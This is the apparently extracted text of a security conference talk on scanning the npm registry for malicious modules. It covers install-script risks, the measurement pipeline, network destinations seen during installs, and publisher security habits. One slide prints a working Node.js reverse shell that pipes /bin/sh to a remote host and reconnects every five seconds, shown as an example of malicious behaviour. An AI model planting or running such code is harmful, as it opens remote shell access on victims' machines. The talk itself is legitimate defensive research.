Hunting for Malicious Modules in

adam_baldwinevilpacket

liftsecurity.io

nodesecurity.ioContinous Security Monitoring

Hunting for Malicious Modules in

WHY SHOULD WE HUNT?

🕯Hey, I can publish malicious

code to npm

💨this is bad.

🔥install scripts are BAD!

💩JavaScript BAD!

rimrafall

npm hydra worm

WHAT ARE WE HUNTING?

WHAT DEFINES MALICIOUS BEHAVIOR?

var net = require('net');var daemon = require('daemon');var spawn = require('child_process').spawn;

function c() { var client = new net.Socket(); client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []); client.write("Connected\r\n"); client.pipe(sh.stdin); sh.stdout.pipe(client); });

client.on('error', function() {});

client.on('close', function() { setTimeout(c, 5000); });}

require('daemon')();c();

😈Example

client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []);

WHERE ARE WE HUNTING?

507,573 modules

3,443,784 individual versions

242,505,822 individual files

21,756 modules with install scripts

HOW AM I HUNTING?

MIRROR REGISTRY

INDEX MODULESFilenames Extensions Content Hash

npm install module

syscall capture

DB

npm publish GCS

PubSubInstrumentation

npm iraw data 🎉

~24,000 modules processed

2.1 TB OF DATA 😲

22 53 80

443 1880 3000

9418 23400 27017 38584 54329 61337

3001 3306 4987 6379 8000 8002

8008 8043 8080 8090 9000 9001

DESTINATION PORTS

DNS REQUESTS

339 unique lookups

DESTINATION HOSTS

1080 unique hosts

RESULTS😈

144+ modules that download build components over HTTP

Insecure Behavior

Modules that called home

et_phone_home anarchy harmlesspackage botbait

Modules that change registry settings

😇 ? 😈

😢 / 😀

WHAT DID I LEARN?How can we improve the future

People will publish malicious things to the registry

Your security habits have a lot to do with if this gets exploited or not

-Have good passwords -Don't publish credentials -Limit the # of publishers

But what about ? Can't they do something?

</presentation>Thanks

adam_baldwinevilpacket